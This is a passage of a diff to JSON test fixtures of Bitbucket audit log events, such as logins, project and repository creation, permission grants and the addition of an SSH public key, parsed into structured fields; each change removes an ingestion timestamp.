AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035959,\"nano\":377000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -3730,7 +3682,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020806898Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User login failed\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationfailure\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"ADVANCED\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Error\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authenticationfailure.error\",\"value\":\"Invalid username or password.\"},{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035966,\"nano\":116000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationfailure", 
@@ -3799,7 +3750,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020807698Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035970,\"nano\":135000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", 
@@ -3878,7 +3828,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020808562Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"199\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:26:25.045Z - 2021-11-27T17:59:30.135Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 199\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638035970,\"nano\":204000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -3929,7 +3878,6 @@ }, "event": { "action": "bitbucket.scm.git.lfs.audit.action.gitlfsfeatureenabled", - "ingested": "2021-12-24T00:37:41.020809311Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"LFS feature enabled\",\"actionI18nKey\":\"bitbucket.scm.git.lfs.audit.action.gitlfsfeatureenabled\",\"area\":\"GLOBAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Global administration\",\"categoryI18nKey\":\"bitbucket.service.audit.category.globaladministration\",\"level\":\"ADVANCED\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036037,\"nano\":416000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -3994,7 +3942,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectcreationrequested", - "ingested": "2021-12-24T00:37:41.020810039Z", "original": "{\"affectedObjects\":[{\"id\":\"0\",\"name\":\"TEST\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project creation requested\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectcreationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036077,\"nano\":660000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4074,7 +4021,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.projectpermissiongranted", - "ingested": "2021-12-24T00:37:41.020810765Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"2\",\"name\":\"admin\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Project permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.projectpermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"PROJECT_ADMIN\\\",\\\"user\\\":\\\"admin\\\"}\"},{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"PROJECT_ADMIN\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036077,\"nano\":828000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -4146,7 +4092,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectcreated", - "ingested": "2021-12-24T00:37:41.020811563Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project created\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectcreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036077,\"nano\":832000000},\"version\":\"1.0\"}", "type": [ "creation" 
@@ -4241,7 +4186,6 @@ }, "event": { "action": "bitbucket.branch.audit.action.projectbranchmodelconfigurationcreated", - "ingested": "2021-12-24T00:37:41.020812295Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project branch model created\",\"actionI18nKey\":\"bitbucket.branch.audit.action.projectbranchmodelconfigurationcreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Feature prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.featureprefix\",\"value\":\"feature/\"},{\"name\":\"Development branch\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.developmentbranch\",\"value\":\"(default branch)\"},{\"name\":\"Hotfix prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.hotfixprefix\",\"value\":\"hotfix/\"},{\"name\":\"Bugfix prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.bugfixprefix\",\"value\":\"bugfix/\"},{\"name\":\"Production branch\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.productionbranch\",\"value\":\"(none)\"},{\"name\":\"Release prefix\",\"nameI18nKey\":\"bitbucket.branch.audit.attribute.branchmodel.releaseprefix\",\"value\":\"release/\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036078,\"nano\":549000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4311,7 +4255,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorycreationrequested", - "ingested": "2021-12-24T00:37:41.020813045Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"0\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository creation requested\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorycreationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036095,\"nano\":988000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4386,7 +4329,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorycreated", - "ingested": "2021-12-24T00:37:41.020813838Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository created\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorycreated\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"project\\\":\\\"TEST\\\",\\\"repository\\\":\\\"test2\\\"}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036101,\"nano\":63000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -4456,7 +4398,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020814562Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036101,\"nano\":495000000},\"version\":\"1.0\"}", "type": [ "access" 
@@ -4531,7 +4472,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020815372Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036200,\"nano\":954000000},\"version\":\"1.0\"}", "type": [ "access" 
@@ -4606,7 +4546,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020816102Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036221,\"nano\":114000000},\"version\":\"1.0\"}", "type": [ "access" 
@@ -4686,7 +4625,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorymodificationrequested", - "ingested": "2021-12-24T00:37:41.020816830Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository change requested\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorymodificationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036221,\"nano\":684000000},\"version\":\"1.0\"}", "type": [ "change" 
@@ -4766,7 +4704,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorymodified", - "ingested": "2021-12-24T00:37:41.020817643Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository settings changed\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorymodified\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036221,\"nano\":710000000},\"version\":\"1.0\"}", "type": [ "change" 
@@ -4841,7 +4778,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020818373Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036222,\"nano\":444000000},\"version\":\"1.0\"}", "type": [ "access" 
@@ -4931,7 +4867,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissiongrantrequested", - "ingested": "2021-12-24T00:37:41.020819098Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission requested\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissiongrantrequested\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"user\\\":\\\"09e096ea84245cc5\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036247,\"nano\":861000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5023,7 +4958,6 @@ }, "event": { "action": "bitbucket.service.user.audit.action.repositorypermissiongranted", - "ingested": "2021-12-24T00:37:41.020819939Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Repository permission granted\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.repositorypermissiongranted\",\"area\":\"PERMISSIONS\",\"category\":\"Permissions\",\"categoryI18nKey\":\"bitbucket.service.audit.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Permission\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.permission.permission\",\"value\":\"REPO_WRITE\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"user\\\":\\\"09e096ea84245cc5\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036248,\"nano\":132000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5115,7 +5049,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshkeycreated", - "ingested": "2021-12-24T00:37:41.020820727Z", "original": "{\"affectedObjects\":[{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User added SSH access key to profile\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshkeycreated\",\"area\":\"USER_MANAGEMENT\",\"category\":\"Users and groups\",\"categoryI18nKey\":\"bitbucket.service.audit.category.usersandgroups\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"id\\\":2,\\\"public-key\\\":\\\"ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\\\r\\\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\\\r\\\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\\\r\\\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\\\r\\\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\\\r\\\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\\\",\\\"label\\\":\\\"schacon@mylaptop.local\\\",\\\"user\\\":{\\\"id\\\":4,\\\"name\\\":\\\"09e096ea84245cc5\\\",\\\"slug\\\":\\\"09e096ea84245cc5\\\"}}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"09e096ea84245cc5\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa 
AAAAB3NzaC1yc2EAAAABIwAAAQEAklOUpkDHrfHY17SbrmTIpNLTGK9Tjom/BWDSU\\r\\nGPl+nafzlHDTYW7hdI4yZ5ew18JH4JW9jbhUFrviQzM7xlELEVf4h9lFX5QVkbPppSwg0cda3\\r\\nPbv7kOdJ/MTyBlWXFCR+HAo3FXRitBqxiX1nKhXpHAZsMciLq8V6RjsNAQwdsdMFvSlVK/7XA\\r\\nt3FaoJoAsncM1Q9x5+3V0Ww68/eIFmb1zuUFljQJKprrX88XypNDvjYNby6vw/Pb0rwert/En\\r\\nmZ+AW4OZPnTPI89ZPmVMLuayrD2cE86Z/il8b+gw3r3+1nKatmIkjn2so1d01QraTlMqVSsbx\\r\\nNrRFi9wrf+M7Q== schacon@mylaptop.local\"},{\"name\":\"Key ID\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.id\",\"value\":\"2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036248,\"nano\":133000000},\"version\":\"1.0\"}", "type": [ "admin", 
@@ -5221,7 +5154,6 @@ }, "event": { "action": "bitbucket.ssh.audit.action.sshaccesskeygranted.repository", - "ingested": "2021-12-24T00:37:41.020821506Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"},{\"id\":\"4\",\"name\":\"09e096ea84245cc5\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"SSH access key added to repository\",\"actionI18nKey\":\"bitbucket.ssh.audit.action.sshaccesskeygranted.repository\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Label\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.label\",\"value\":\"schacon@mylaptop.local\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"{\\\"id\\\":2,\\\"label\\\":\\\"schacon@mylaptop.local\\\"}\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"key\\\":{\\\"id\\\":2,\\\"label\\\":\\\"schacon@mylaptop.local\\\"},\\\"permission\\\":\\\"REPO_WRITE\\\",\\\"repository\\\":{\\\"id\\\":1,\\\"slug\\\":\\\"test2\\\",\\\"project\\\":{\\\"id\\\":2,\\\"key\\\":\\\"TEST\\\"}}}\"},{\"name\":\"Public key\",\"nameI18nKey\":\"bitbucket.ssh.audit.attr.sshkey.publickey\",\"value\":\"ssh-rsa 